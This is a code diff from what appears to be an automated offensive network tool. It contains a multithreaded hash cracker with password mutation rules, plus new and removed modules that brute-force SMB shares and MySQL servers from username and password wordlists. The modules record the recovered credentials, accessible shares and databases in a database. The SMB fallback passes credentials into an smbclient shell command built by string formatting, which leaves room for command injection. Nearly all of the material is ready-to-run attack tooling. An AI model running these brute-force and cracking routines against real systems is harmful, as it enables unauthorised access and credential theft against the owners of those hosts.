self.wordlist = wordlist
self.rules = rules
self.hash_type = hash_type
self.output_dir = output_dir
self.hashes = set()
self.cracked = {}
self.lock = threading.Lock()
# Load mutation rules
self.mutation_rules = self.load_rules()
def load_hashes(self):
"""Load hashes from input file and validate format."""
try:
with open(self.input_file, 'r') as f:
for line in f:
hash_value = line.strip()
if self.hash_type:
if re.match(HASH_PATTERNS[self.hash_type], hash_value):
self.hashes.add(hash_value)
else:
# Try to auto-detect hash type
for h_type, pattern in HASH_PATTERNS.items():
if re.match(pattern, hash_value):
self.hashes.add(hash_value)
break
logging.info(f"Loaded {len(self.hashes)} valid hashes")
except Exception as e:
logging.error(f"Error loading hashes: {e}")
def load_wordlist(self):
"""Load password wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r', errors='ignore') as f:
return [line.strip() for line in f if line.strip()]
return ['password', 'admin', '123456', 'qwerty', 'letmein']
def load_rules(self):
"""Load mutation rules."""
if self.rules and os.path.exists(self.rules):
with open(self.rules, 'r') as f:
return [line.strip() for line in f if line.strip() and not line.startswith('#')]
return [
'capitalize',
'lowercase',
'uppercase',
'l33t',
'append_numbers',
'prepend_numbers',
'toggle_case'
]
def apply_mutations(self, word):
"""Apply various mutation rules to a word."""
mutations = set([word])
for rule in self.mutation_rules:
if rule == 'capitalize':
mutations.add(word.capitalize())
elif rule == 'lowercase':
mutations.add(word.lower())
elif rule == 'uppercase':
mutations.add(word.upper())
elif rule == 'l33t':
mutations.add(word.replace('a', '@').replace('e', '3').replace('i', '1')
.replace('o', '0').replace('s', '5'))
elif rule == 'append_numbers':
mutations.update(word + str(n) for n in range(100))
elif rule == 'prepend_numbers':
mutations.update(str(n) + word for n in range(100))
elif rule == 'toggle_case':
mutations.add(''.join(c.upper() if i % 2 else c.lower()
for i, c in enumerate(word)))
return mutations
def hash_password(self, password, hash_type):
"""Generate hash for a password using specified algorithm."""
if hash_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif hash_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif hash_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif hash_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif hash_type == 'ntlm':
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
return None
def crack_password(self, password):
"""Attempt to crack hashes using a single password and its mutations."""
try:
mutations = self.apply_mutations(password)
for mutation in mutations:
for hash_type in HASH_PATTERNS.keys():
if not self.hash_type or self.hash_type == hash_type:
hash_value = self.hash_password(mutation, hash_type)
if hash_value in self.hashes:
with self.lock:
self.cracked[hash_value] = {
'password': mutation,
'hash_type': hash_type,
'timestamp': datetime.now().isoformat()
}
logging.info(f"Cracked hash: {hash_value[:8]}... = {mutation}")
except Exception as e:
logging.error(f"Error cracking with password {password}: {e}")
def save_results(self):
"""Save cracked passwords to JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'total_hashes': len(self.hashes),
'cracked_count': len(self.cracked),
'cracked_hashes': self.cracked
}
output_file = os.path.join(self.output_dir, f"cracked_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the password cracking process."""
try:
logging.info("Starting password cracking process")
self.load_hashes()
if not self.hashes:
logging.error("No valid hashes loaded")
return
wordlist = self.load_wordlist()
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.crack_password, wordlist)
self.save_results()
logging.info(f"Cracking completed. Cracked {len(self.cracked)}/{len(self.hashes)} hashes")
except Exception as e:
logging.error(f"Error during execution: {e}")
def save_settings(input_file, wordlist, rules, hash_type, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_file": input_file,
"wordlist": wordlist,
"rules": rules,
"hash_type": hash_type,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Advanced password cracker")
parser.add_argument("-i", "--input", help="Input file containing hashes")
parser.add_argument("-w", "--wordlist", help="Path to password wordlist")
parser.add_argument("-r", "--rules", help="Path to rules file")
parser.add_argument("-t", "--type", choices=list(HASH_PATTERNS.keys()), help="Hash type")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
input_file = args.input or settings.get("input_file")
wordlist = args.wordlist or settings.get("wordlist")
rules = args.rules or settings.get("rules")
hash_type = args.type or settings.get("hash_type")
output_dir = args.output or settings.get("output_dir")
if not input_file:
logging.error("Input file is required. Use -i or save it in settings")
return
save_settings(input_file, wordlist, rules, hash_type, output_dir)
cracker = RuneCracker(
input_file=input_file,
wordlist=wordlist,
rules=rules,
hash_type=hash_type,
output_dir=output_dir
)
cracker.execute()
if __name__ == "__main__":
main()

File diff suppressed because it is too large Load Diff

331
actions/smb_bruteforce.py Normal file
View File

@@ -0,0 +1,331 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par lorchestrateur (ip, port)
- IP -> (MAC, hostname) depuis DB.hosts
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
"""
import os
import threading
import logging
import time
from subprocess import Popen, PIPE
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
b_class = "SMBBruteforce"
b_module = "smb_bruteforce"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""Wrapper orchestrateur -> SMBConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_bruteforce = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""Lance le bruteforce SMB pour (ip, port)."""
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
pass
return accessible
except Exception:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
else:
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
return []
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
shares = []
for line in smbclient_output.splitlines():
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts:
name = parts[0]
if name not in IGNORED_SHARES:
shares.append(name)
return shares
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('smb',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='smb'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for SMB bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
def run_bruteforce(self, adresse_ip: str, port: int):
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
# Fallback smbclient -L si rien trouvé
if not success_flag[0]:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
return success_flag[0], self.results
# ---------- persistence DB ----------
def save_results(self):
# insère self.results dans creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="smb",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=share, # utilise la colonne 'database' pour distinguer les shares
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=share
)
else:
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
self.results = []
def removeduplicates(self):
# plus nécessaire avec l'index unique; conservé pour compat.
pass
if __name__ == "__main__":
# Mode autonome non utilisé en prod; on laisse simple
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
logger.info("SMB brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,261 +0,0 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

284
actions/sql_bruteforce.py Normal file
View File

@@ -0,0 +1,284 @@
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads)
"""
import os
import pymysql
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
b_class = "SQLBruteforce"
b_module = "sql_bruteforce"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
b_service = '["sql"]'
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class SQLBruteforce:
"""Wrapper orchestrateur -> SQLConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_bruteforce = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""Lance le bruteforce SQL pour (ip, port)."""
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
self.queue = Queue()
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str):
"""
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
"""
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
try:
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
finally:
try:
conn.close()
except Exception:
pass
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('sql',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='sql'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread to process SQL bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_sql", 0) > 0:
time.sleep(self.shared_data.timewait_sql)
def run_bruteforce(self, adresse_ip: str, port: int):
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
# ---------- persistence DB ----------
def save_results(self):
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
try:
self.shared_data.db.insert_cred(
service="sql",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=dbname,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=dbname
)
else:
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
self.results = []
def remove_duplicates(self):
# inutile avec lindex unique; conservé pour compat.
pass
if __name__ == "__main__":
try:
sd = SharedData()
sql_bruteforce = SQLBruteforce(sd)
logger.info("SQL brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,204 +0,0 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
